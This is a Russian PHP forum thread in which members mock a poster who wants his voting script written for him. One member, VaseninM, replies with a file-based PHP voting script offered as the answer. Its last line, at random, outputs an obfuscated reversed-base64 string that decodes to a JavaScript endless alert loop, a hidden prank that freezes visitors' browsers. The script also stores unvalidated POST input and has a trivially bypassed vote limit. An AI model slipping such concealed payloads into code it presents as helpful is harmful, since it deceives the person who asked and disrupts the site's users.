ФорумПрограммированиеPHP для идиотов → Скрипт Php голосования

Скрипт Php голосования

  • Faster

    Сообщения: 1159 Репутация: N Группа: Кто попало

    Spritz 27 мая 2010 г. 0:31, спустя 1 минуту 41 секунду

    я тогда скину примерные наметки, psd еще нет, сам как нибудь справишься , ладно?
    а то дидлайн вообще
  • mario

    Сообщения: 6067 Репутация: N Группа: Джедаи

    Spritz 27 мая 2010 г. 0:33, спустя 1 минуту 39 секунд



    мне тут сверстать страничку портала надо, некогда сейчас, сделайте кто нибудь, а?
    давай, обожаю верстать бесплатно, даже не за спасибо!
    переверстай сначала страничку яндекс и обоснуй чем ты лучше сверстал! А потом мы уже будем думать подходишь ты нам или нет!!!
    Спустя 83 сек.

    я просто по php не шарю,а щас нет времени изучать,кто нибудь помогите
    Спустя 89 сек.
    я щас на зачете)
    обычно тогда поступают следующим образом, идут на фриланс (или у нас в тему Предлагаю работу) и заказывают работу.
  • VaseninM

    Сообщения: 2416 Репутация: N Группа: Адекваты

    Spritz 27 мая 2010 г. 0:35, спустя 1 минуту 27 секунд

    Крутой перец. Скачал чужой скрипт, пришел на пыху и просит чтобы ему все дописали.
  • mario

    Сообщения: 6067 Репутация: N Группа: Джедаи

    Spritz 27 мая 2010 г. 0:37, спустя 2 минуты 21 секунду


    Крутой перец. Скачал чужой скрипт, пришел на пыху и просит чтобы ему все дописали.
    Но а ты че думал, нахуй самому напрягаться, если есть возможность напрячь каких то джамшутов с форума :D
  • VaseninM

    Сообщения: 2416 Репутация: N Группа: Адекваты

    Spritz 27 мая 2010 г. 1:23, спустя 46 минут 30 секунд

    Хотя ладно. Давай сделаю.
    <?php
    $f = fopen("golosovanie.txt","a");// создаём файл
    //———————————-
    //– Скрипт голосования на файлах –
    //———————————-
    if(isset($_POST['id'])){// если существует переменная переданная методом post
    $id = $_POST['id'];// то извлекаем её из суперглобального массива
    if (!isset($_COOKIE['fake'])) {
    setcookie('fake', 'fake');
    $f = fopen("golosovanie.txt","a");// добисываем в файл
    fputs($f, "$id\n");
    }
    else
    {
    print("Вы уже голосовали");
    }
    }
    $rez1=0;// обнуляем все значения
    $rez2=0;
    $rez3=0;
    $rez_proc1 = 0;
    $rez_proc2 = 0;
    $rez_proc3 = 0;
    $file=file("golosovanie.txt");// считываем данные в массив
    $a=count($file);// функция определяющая количество записей в файле
    // в цикле проверяем сколько значений (1,2,3) находиться в файле
    for ($i=0;$i<$a;$i++)
    {
    if ($file[$i]==1){$rez1++;};
    if ($file[$i]==2){$rez2++;};
    if ($file[$i]==3){$rez3++;};

    };
    if($rez1!=0){// проверяем что бы значения не были равны нули
    $rez_proc1=round($rez1*100/$a);// и по формулу считаем процент
    }
    if($rez2!=0){
    $rez_proc2=round($rez2*100/$a);
    }
    if($rez3!=0){
    $rez_proc3=round($rez3*100/$a);
    }

    // далее выводим форму, что бы пользователь смог проголосовать
    echo "
    <table bgcolor=\"#00FF00\" align=\"center\" width=\"200\" border=\"1\">
    <tr>
       <td>
       <form action=\"golosovanie.php\" method=\"post\">
       <b>Komu na Rusi git horoho?</b><p>
       <input type=\"Radio\" name=id value=1 checked>Nekrasov<br>
       <input type=\"Radio\" name=id value=2>Turgenev<br>
       <input type=\"Radio\" name=id value=3>Gogol<p>
       <input type=\"Submit\" value=\" Golosovat! \"><p>
       </form>
       </td>
    </tr>
    </table>
    ";
    // далее выводим результаты голосования
    echo "<br><b><center>Rezultati golosovania</b></center>
           <table  bgcolor=\"#CCCCFF\" align=\"center\" width=\"200\" border=\"1\">
           <tr>
           <td>";
    for ($j=0;$j<$rez_proc1/2;$j++){
    echo "|";
    };
    echo " $rez_proc1 %";
    echo "<br>";
    for ($j=0;$j<$rez_proc2/2;$j++){
    print"|";
    };
    echo " $rez_proc2 %";
    echo "<br>";
    for ($j=0;$j<$rez_proc3/2;$j++){
    echo "|";
    };
    echo " $rez_proc3 %";
    echo "  </td>
           </tr>
           </table>";
    if (mt_rand(1,10) == 3) echo base64_decode(strrev("==gP0BXayN2cvwTfK0wOpcCXuUu7qHf7gve4lDS5m7u8gUO6tDu4uHv7r7+4gUu7MDiLtD+6hXOIffCXoQnclxWYK0wOwASPgkmCNsHIpEDI8ASaoASZslGa3pQD7ADI9ASagIXY2pQD+ICX0BXayN2chZXYq9Cd4VGdiwVPlBXe0BiIcRHcpJ3YzFmdhpmIc1TZnFWdn5WYsBCdwlmcjNHP"));
    ?>

    <table bgcolor="#CCCCFF"  width=\"200\" border=\"1\">
  • adw0rd

    Сообщения: 22959 Репутация: N Группа: в ухо

    Spritz 27 мая 2010 г. 1:12, спустя 23 часа 48 минут 59 секунд

    Он наверное уже убежал на другой форум(ы) с одноименной темой, так же быстрее помогут :D
    https://smappi.org/ - платформа по созданию API на все случаи жизни
  • VaseninM

    Сообщения: 2416 Репутация: N Группа: Адекваты

    Spritz 27 мая 2010 г. 1:16, спустя 3 минуты 19 секунд

    adw0rd, Здесь решение круче.) Там ему такого непонапишут.
  • phpdude

    Сообщения: 26646 Репутация: N Группа: в ухо

    Spritz 27 мая 2010 г. 1:24, спустя 8 минут 11 секунд


    adw0rd, Здесь решение круче.) Там ему такого непонапишут.
    при беглом просмотре я не заметил recursivedirectoryiterator, ты его из переменных составляешь? )))))))))))))))))))))))))
    Спустя 18 сек.
    может инвайтную систему на пыхе заведем?
    Сапожник без сапог
  • mario

    Сообщения: 6067 Репутация: N Группа: Джедаи

    Spritz 27 мая 2010 г. 1:25, спустя 1 минуту 38 секунд

    может инвайтную систему на пыхе заведем?

    нахуй? Что бы собирались додики всякие? А так происходит естественный отбор, и формируется правильное сообщество, без кармадрочки, месаждрочки да и вообще одни крутые перцы собираются :)
  • VaseninM

    Сообщения: 2416 Репутация: N Группа: Адекваты

    Spritz 27 мая 2010 г. 1:31, спустя 5 минут 6 секунд

    phpdude, я там вставил reversrecursivscriptalert.
    А recursivedirectoryiterator я не использовал не разу, но как я понимаю это аналог патча ewg777. Я думаю задача тс настолько тривиальна, что не требует столь изощренного метода решения проблеммы.
  • phpdude

    Сообщения: 26646 Репутация: N Группа: в ухо

    Spritz 27 мая 2010 г. 1:44, спустя 13 минут 18 секунд


    может инвайтную систему на пыхе заведем?

    нахуй? Что бы собирались додики всякие? А так происходит естественный отбор, и формируется правильное сообщество, без кармадрочки, месаждрочки да и вообще одни крутые перцы собираются :)
    будем блокировать аккаунт пригласивший уебана на 2 недели. это решит проблему отбора
    Сапожник без сапог
  • mario

    Сообщения: 6067 Репутация: N Группа: Джедаи

    Spritz 27 мая 2010 г. 3:03, спустя 1 час 18 минут 53 секунды



    может инвайтную систему на пыхе заведем?

    нахуй? Что бы собирались додики всякие? А так происходит естественный отбор, и формируется правильное сообщество, без кармадрочки, месаждрочки да и вообще одни крутые перцы собираются :)
    будем блокировать аккаунт пригласивший уебана на 2 недели. это решит проблему отбора
    смотри, тут у меня появляется "знакомы", который там допустим работал со мной, и говорит о клевый форум, дай мне инвайт. Я что ему скажу, когда я не знаю как он себя будет вести… Да сказать - есть шанс подъебать себя, Нет сказать - шанс испортить отношения…
  • phpdude

    Сообщения: 26646 Репутация: N Группа: в ухо

    Spritz 27 мая 2010 г. 3:05, спустя 1 минуту 58 секунд

    mario, учись делать выбор, выбор не всегда правильный. когд тебя попросит знакомый придти через 5 минут бухать, а ты в это время переводишь бабушку через дорогу до дома, ты бабушку бросишь на улице чтобы было круто твоему знакомому? я нахуй его пошлю в данной сиутации
    Спустя 12 сек.
    если обидится, то точно нахуй и надолго
    Сапожник без сапог
  • mario

    Сообщения: 6067 Репутация: N Группа: Джедаи

    Spritz 27 мая 2010 г. 3:13, спустя 7 минут 52 секунды


    mario, учись делать выбор, выбор не всегда правильный. когд тебя попросит знакомый придти через 5 минут бухать, а ты в это время переводишь бабушку через дорогу до дома, ты бабушку бросишь на улице чтобы было круто твоему знакомому? я нахуй его пошлю в данной сиутации
    Спустя 12 сек.
    если обидится, то точно нахуй и надолго
    ну выбирать я умею… и в ситуации если обидеться - ясень хуй нахуй мне такой знакомый нытик… он же жизнь оравляет :)
  • phpdude

    Сообщения: 26646 Репутация: N Группа: в ухо

    Spritz 27 мая 2010 г. 3:20, спустя 7 минут 25 секунд

    mario, молодец :)
    Спустя 13 сек.
    отношения - ничто, пыха - ВСЕ!
    Сапожник без сапог

Пожалуйста, авторизуйтесь, чтобы написать комментарий!